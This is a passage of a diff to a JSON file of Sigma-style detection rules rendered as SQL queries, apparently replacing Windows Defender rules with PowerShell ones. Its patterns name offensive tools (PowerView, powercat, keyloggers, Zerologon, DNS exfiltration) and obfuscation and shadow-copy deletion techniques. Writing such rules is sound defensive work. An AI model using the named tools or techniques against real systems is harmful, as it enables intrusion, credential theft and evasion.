'%Invoke-StandIn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-StickyNotesExtract.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Tater.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Thunderfox.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ThunderStruck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-TokenManipulation.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Tokenvator.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-TotalExec.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-UrbanBishop.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-UserHunter.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-VoiceTroll.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Whisker.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WinEnum.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-winPEAS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WireTap.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WmiCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WScriptBypassUAC.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Zerologon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Keylogger.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%MailRaider.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%New-HoneyHash.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%OfficeMemScraper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Offline\\_Winpwn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-CHM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-DnsTxt.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Excel.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-HTA.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Java.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-JS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Minidump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-RundllCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-SCF.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-SCT.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Shortcut.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-WebQuery.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Word.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Parse\\_Keys.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Port-Scan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerBreach.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%powercat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerRunAsSystem.psm1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerSharpPack.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerUp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerUpSQL.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerView.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PSAsyncShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%RemoteHashRetrieval.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-Persistence.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-PoshRat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-Update.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Run-EXEonRemote.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Schtasks-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-DCShadowPermissions.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-MacAttribute.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-RemotePSRemoting.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-RemoteWMI.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-Wallpaper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Show-TargetScreen.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Speak.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Start-CaptureServer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Start-WebcamRecorder.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%StringToBase64.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%TexttoExe.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%VolumeShadowCopyTools.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%WinPwn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%WSUSpendu.ps1%' ESCAPE '\\') OR (ContextInfo LIKE '%Invoke-Sharp%' ESCAPE '\\' AND ContextInfo LIKE '%.ps1%' ESCAPE '\\')))" ], - "filename": "win_mssql_sp_procoption_set.yml" + "filename": "posh_pm_exploit_scripts.yml" }, { - "title": "LPE InstallerFileTakeOver PoC CVE-2021-41379", - "id": "7dbb86de-a0cc-494c-8aa8-b2996c9ef3c8", + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module", + "id": "f3c89218-8c3d-4ba9-9974-f1d8e6a1b4a6", "status": "experimental", - "description": "Detects PoC tool used to exploit LPE vulnerability CVE-2021-41379", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.initial_access", - "attack.t1190" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Other MSI packages for which your admins have used that name" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1033' AND Provider_Name = 'MsiInstaller' AND Data LIKE '%test pkg%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*&&set.*(\\{\\d\\}){2,}\\\\\"\\s+?-f.*&&.*cmd.*/c')" ], - "filename": "win_vul_cve_2021_41379.yml" + "filename": "posh_pm_invoke_obfuscation_via_var.yml" }, { - "title": "Microsoft Malware Protection Engine Crash", - "id": "6c82cf5c-090d-4d57-9188-533577631108", + "title": "Invoke-Obfuscation VAR+ Launcher - PowerShell Module", + "id": "6bfb8fa7-b2e7-4f6c-8d9d-824e5d06ea9e", "status": "experimental", - "description": "This rule detects a suspicious crash of the Microsoft Malware Protection Engine", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1211", - "attack.t1562.001" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "MsMpEng.exe can crash when C:\\ is full" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND ((Provider_Name = 'Application Error' AND EventID = '1000') OR (Provider_Name = 'Windows Error Reporting' AND EventID = '1001')) AND (Data LIKE '%MsMpEng.exe%' ESCAPE '\\' AND Data LIKE '%mpengine.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r)(?:\\s|)\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\"\\s+?-f(?:.*\\)){1,}.*\"')" ], - "filename": "win_susp_msmpeng_crash.yml" + "filename": "posh_pm_invoke_obfuscation_var.yml" }, { - "title": "Atera Agent Installation", - "id": "87261fb2-69d0-42fe-b9de-88c6b5f65a43", - "status": "test", - "description": "Detects successful installation of Atera Remote Monitoring & Management (RMM) agent as recently found to be used by Conti operators", - "author": "Bhabesh Raj", + "title": "Invoke-Obfuscation Via Use Clip - PowerShell Module", + "id": "ebdf49d8-b89c-46c9-8fdf-2c308406f6bd", + "status": "experimental", + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.t1219" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate Atera agent installation" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1033' AND Provider_Name = 'MsiInstaller' AND Message LIKE '%AteraAgent%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*')" ], - "filename": "win_software_atera_rmm_agent_install.yml" + "filename": "posh_pm_invoke_obfuscation_via_use_clip.yml" }, { - "title": "Restricted Software Access By SRP", - "id": "b4c8da4a-1c12-46b0-8a2b-0a8521d03442", + "title": "Invoke-Obfuscation Via Stdin - PowerShell Module", + "id": "c72aca44-8d52-45ad-8f81-f96c4d3c755e", "status": "experimental", - "description": "Detects restricted access to applications by the Software Restriction Policies (SRP) policy", - "author": "frack113", + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1072" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Microsoft-Windows-SoftwareRestrictionPolicies' AND EventID IN ('865', '866', '867', '868', '882'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*(set).*&&\\s?set.*(environment|invoke|\\$?\\{?input).*&&.*\"')" ], - "filename": "win_software_restriction_policies_block.yml" + "filename": "posh_pm_invoke_obfuscation_via_stdin.yml" }, { - "title": "Audit CVE Event", - "id": "48d91a3a-2363-43ba-a456-ca71ac3da5c2", - "status": "experimental", - "description": "Detects events generated by user-mode applications when they call the CveEventWrite API when a known vulnerability is trying to be exploited.\nMS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability.\nUnfortunately, that is about the only instance of CVEs being written to this log.\n", - "author": "Florian Roth (Nextron Systems), Zach Mathis", + "title": "Silence.EDA Detection", + "id": "3ceb2083-a27f-449a-be33-14ec1b7cc973", + "status": "test", + "description": "Detects Silence EmpireDNSAgent as described in the Group-IP report", + "author": "Alina Stepchenkova, Group-IB, oscd.community", "tags": [ "attack.execution", - "attack.t1203", - "attack.privilege_escalation", - "attack.t1068", - "attack.defense_evasion", - "attack.t1211", - "attack.credential_access", - "attack.t1212", - "attack.lateral_movement", - "attack.t1210", + "attack.t1059.001", + "attack.command_and_control", + "attack.t1071.004", + "attack.t1572", "attack.impact", - "attack.t1499.004" + "attack.t1529", + "attack.g0091", + "attack.s0363" ], "falsepositives": [ "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name IN ('Microsoft-Windows-Audit-CVE', 'Audit-CVE') AND EventID = '1')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.Diagnostics.Process%' ESCAPE '\\' AND ScriptBlockText LIKE '%Stop-Computer%' ESCAPE '\\' AND ScriptBlockText LIKE '%Restart-Computer%' ESCAPE '\\' AND ScriptBlockText LIKE '%Exception in execution%' ESCAPE '\\' AND ScriptBlockText LIKE '%$cmdargs%' ESCAPE '\\' AND ScriptBlockText LIKE '%Close-Dnscat2Tunnel%' ESCAPE '\\' AND ScriptBlockText LIKE '%set type=$LookupType`nserver%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Command | nslookup 2>&1 | Out-String%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-RandomDNSField%' ESCAPE '\\' AND ScriptBlockText LIKE '%[Convert]::ToString($SYNOptions, 16)%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Session.Dead = $True%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Session[\"Driver\"] -eq%' ESCAPE '\\')" ], - "filename": "win_audit_cve.yml" + "filename": "posh_ps_apt_silence_eda.yml" }, { - "title": "Potential Credential Dumping Via WER - Application", - "id": "a18e0862-127b-43ca-be12-1a542c75c7c5", + "title": "Invoke-Obfuscation Via Use Rundll32 - PowerShell", + "id": "a5a30a6e-75ca-4233-8b8c-42e0f2037d3b", "status": "experimental", - "description": "Detects windows error reporting event where the process that crashed is lsass. This could be the cause of an intentional crash by techniques such as Lsass-Shtinkering to dump credential", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Rare legitimate crashing of the lsass process" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Application Error' AND EventID = '1000' AND AppName = 'lsass.exe' AND ExceptionCode = 'c0000001')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%&&%' ESCAPE '\\' AND ScriptBlockText LIKE '%rundll32%' ESCAPE '\\' AND ScriptBlockText LIKE '%shell32.dll%' ESCAPE '\\' AND ScriptBlockText LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ScriptBlockText LIKE '%value%' ESCAPE '\\' OR ScriptBlockText LIKE '%invoke%' ESCAPE '\\' OR ScriptBlockText LIKE '%comspec%' ESCAPE '\\' OR ScriptBlockText LIKE '%iex%' ESCAPE '\\'))" ], - "filename": "win_werfault_susp_lsass_credential_dump.yml" + "filename": "posh_ps_invoke_obfuscation_via_use_rundll32.yml" }, { - "title": "Windows Defender Suspicious Configuration Changes", - "id": "801bd44f-ceed-4eb6-887c-11544633c0aa", - "status": "stable", - "description": "Detects suspicious changes to the windows defender configuration", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Clearing Windows Console History", + "id": "bde47d4b-9987-405c-94c7-b080410e8ea7", + "status": "test", + "description": "Identifies when a user attempts to clear console history. An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.", + "author": "Austin Songer @austinsonger", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1070", + "attack.t1070.003" ], "falsepositives": [ - "Administrator activity (must be investigated)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '5007' AND (NewValue LIKE '%\\\\Windows Defender\\\\DisableAntiSpyware %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableRemovableDriveScanning %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableScanningMappedNetworkDrivesForFullScan %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\SpyNet\\\\DisableBlockAtFirstSeen %' ESCAPE '\\' OR NewValue LIKE '%\\\\Real-Time Protection\\\\SpyNetReporting %' ESCAPE '\\' OR NewValue LIKE '%\\\\Real-Time Protection\\\\SubmitSamplesConsent %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Clear-History%' ESCAPE '\\' OR ((ScriptBlockText LIKE '%Remove-Item%' ESCAPE '\\' OR ScriptBlockText LIKE '%rm%' ESCAPE '\\') AND (ScriptBlockText LIKE '%ConsoleHost\\_history.txt%' ESCAPE '\\' OR ScriptBlockText LIKE '%(Get-PSReadlineOption).HistorySavePath%' ESCAPE '\\'))))" ], - "filename": "win_defender_suspicious_features_tampering.yml" + "filename": "posh_ps_clearing_windows_console_history.yml" }, { - "title": "Win Defender Restored Quarantine File", - "id": "bc92ca75-cd42-4d61-9a37-9d5aa259c88b", + "title": "Disable-WindowsOptionalFeature Command PowerShell", + "id": "99c4658d-2c5e-4d87-828d-7c066ca537c3", "status": "experimental", - "description": "Detects the restoration of files from the defender quarantine", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", + "author": "frack113", "tags": [ "attack.defense_evasion", "attack.t1562.001" ], "falsepositives": [ - "Legitimate administrator activity restoring a file" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1009')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Disable-WindowsOptionalFeature%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Online%' ESCAPE '\\' AND ScriptBlockText LIKE '%-FeatureName%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Windows-Defender-Gui%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender-Features%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender-ApplicationGuard%' ESCAPE '\\'))" ], - "filename": "win_defender_restored_quarantine_file.yml" + "filename": "posh_ps_disable_windows_optional_feature.yml" }, { - "title": "Windows Defender Exploit Guard Tamper", - "id": "a3ab73f1-bd46-4319-8f06-4b20d0617886", + "title": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell", + "id": "1b9dc62e-6e9e-42a3-8990-94d7a10007f7", "status": "experimental", - "description": "Detects when someone is adding or removing applications or folder from exploit guard \"ProtectedFolders\" and \"AllowedApplications\"", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \\u2014", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND ((EventID = '5007' AND NewValue LIKE '%\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\AllowedApplications\\\\%' ESCAPE '\\' AND (NewValue LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')) OR (EventID = '5007' AND OldValue LIKE '%\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\ProtectedFolders\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ScriptBlockText REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ScriptBlockText REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ScriptBlockText REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ScriptBlockText REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR ScriptBlockText REGEXP '\\$VerbosePreference\\.ToString\\('))" ], - "filename": "win_defender_exploit_guard_tamper.yml" + "filename": "posh_ps_invoke_obfuscation_obfuscated_iex.yml" }, { - "title": "LSASS Access Detected via Attack Surface Reduction", - "id": "a0a278fe-2c0e-4de2-ac3c-c68b08a9ba98", - "status": "experimental", - "description": "Detects Access to LSASS Process", - "author": "Markus Neis", + "title": "Powershell DNSExfiltration", + "id": "d59d7842-9a21-4bc6-ba98-64bfe0091355", + "status": "test", + "description": "DNSExfiltrator allows for transferring (exfiltrate) a file over a DNS request covert channel", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.exfiltration", + "attack.t1048" ], "falsepositives": [ - "Google Chrome GoogleUpdate.exe", - "Some Taskmgr.exe related activity" + "Legitimate script" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND (EventID = '1121' AND Path LIKE '%\\\\lsass.exe' ESCAPE '\\') AND NOT ((ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (ProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor.exe' ESCAPE '\\')) OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\atiesrxx.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\nvwmi64.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\Taskmgr.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\')) OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\DriverStore\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\WINDOWS\\\\Installer\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Invoke-DNSExfiltrator%' ESCAPE '\\' OR (ScriptBlockText LIKE '% -i %' ESCAPE '\\' AND ScriptBlockText LIKE '% -d %' ESCAPE '\\' AND ScriptBlockText LIKE '% -p %' ESCAPE '\\' AND ScriptBlockText LIKE '% -doh %' ESCAPE '\\' AND ScriptBlockText LIKE '% -t %' ESCAPE '\\')))" ], - "filename": "win_defender_alert_lsass_access.yml" + "filename": "posh_ps_invoke_dnsexfiltration.yml" }, { - "title": "PSExec and WMI Process Creations Block", - "id": "97b9ce1e-c5ab-11ea-87d0-0242ac130003", - "status": "test", - "description": "Detects blocking of process creations originating from PSExec and WMI commands", - "author": "Bhabesh Raj", + "title": "Execution via CL_Invocation.ps1 - Powershell", + "id": "4cd29327-685a-460e-9dac-c3ab96e549dc", + "status": "experimental", + "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.execution", - "attack.lateral_movement", - "attack.t1047", - "attack.t1569.002" + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1121' AND (ProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\psexesvc.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%CL\\_Invocation.ps1%' ESCAPE '\\' AND ScriptBlockText LIKE '%SyncInvoke%' ESCAPE '\\')" ], - "filename": "win_defender_psexec_wmi_asr.yml" + "filename": "posh_ps_cl_invocation_lolscript.yml" }, { - "title": "Windows Defender AMSI Trigger Detected", - "id": "ea9bf0fa-edec-4fb8-8b78-b119f2528186", - "status": "stable", - "description": "Detects triggering of AMSI by Windows Defender.", - "author": "Bhabesh Raj", + "title": "Invoke-Obfuscation Via Use Clip - Powershell", + "id": "db92dd33-a3ad-49cf-8c2c-608c3e30ace0", + "status": "experimental", + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ + "attack.defense_evasion", + "attack.t1027", "attack.execution", - "attack.t1059" + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1116' AND SourceName = 'AMSI')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*')" ], - "filename": "win_defender_amsi_trigger.yml" + "filename": "posh_ps_invoke_obfuscation_via_use_clip.yml" }, { - "title": "Microsoft Defender Tamper Protection Trigger", - "id": "49e5bc24-8b86-49f1-b743-535f332c2856", - "status": "stable", - "description": "Detects blocked attempts to change any of Defender's settings such as \"Real Time Monitoring\" and \"Behavior Monitoring\"", - "author": "Bhabesh Raj, Nasreddine Bencherchali", + "title": "Delete Volume Shadow Copies via WMI with PowerShell - PS Script", + "id": "e17121b4-ef2a-4418-8a59-12fb1631fa9e", + "status": "test", + "description": "Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Administrator might try to disable defender features during testing (must be investigated)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '5013' AND (Value LIKE '%\\\\Windows Defender\\\\DisableAntiSpyware' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\DisableAntiVirus' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableArchiveScanning' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableScanningNetworkFiles' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableRealtimeMonitoring' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableBehaviorMonitoring' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableIOAVProtection' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableScriptScanning' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' AND ScriptBlockText LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Delete()%' ESCAPE '\\')" ], - "filename": "win_defender_tamper_protection_trigger.yml" + "filename": "posh_ps_susp_win32_shadowcopy.yml" }, { - "title": "Windows Defender Threat Detection Disabled", - "id": "fe34868f-6e0e-4882-81f6-c43aa8f15b62", - "status": "stable", - "description": "Detects disabling Windows Defender threat protection", - "author": "Ján Trenčanský, frack113", + "title": "Powershell Install a DLL in System Directory", + "id": "63bf8794-9917-45bc-88dd-e1b5abc0ecfd", + "status": "experimental", + "description": "Uses PowerShell to install/copy a a file into a system directory such as \"System32\" or \"SysWOW64\"", + "author": "frack113, Nasreddine Bencherchali", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.credential_access", + "attack.t1556.002" ], "falsepositives": [ - "Administrator actions (should be investigated)", - "Seen being triggered occasionally during Windows 8 Defender Updates" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID IN ('5001', '5010', '5012', '5101'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Copy-Item %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Destination %' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Windows\\\\System32%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Windows\\\\SysWOW64%' ESCAPE '\\'))" ], - "filename": "win_defender_disabled.yml" + "filename": "posh_ps_copy_item_system_directory.yml" }, { - "title": "Windows Defender Threat Detected", - "id": 